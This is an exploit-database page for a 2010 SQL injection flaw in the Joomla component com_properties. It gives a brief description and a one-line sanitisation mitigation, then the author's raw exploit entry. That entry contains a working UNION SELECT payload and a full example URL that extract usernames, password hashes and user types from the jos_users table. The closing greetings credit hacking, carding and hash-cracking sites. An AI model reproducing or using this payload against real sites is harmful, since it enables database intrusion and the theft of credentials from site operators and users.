header-logo
Suggest Exploit
vendor:
com_properties
by:
c4uR
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_properties
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_properties[aid] SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'aid' in the 'com_properties' component of Joomla. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author: c4uR [caurcdma@yahoo.com]
Date: April, 10-2010 [INDONESIA]
Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################

+++ Vulnerable File +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]

+++ ExploiT +++
       -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--

+++ Example +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--



###################################################################################

----------------------------------------------------------------------------------

DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com

----------------------------------------------------------------------------------

[ thnx to ]

[+] Apartement Griya Semanggi + poisonV
[+] Indonesia gg ada matinye, walaupun terkadang suram

Navigation

Suggest Exploit

Services By CQR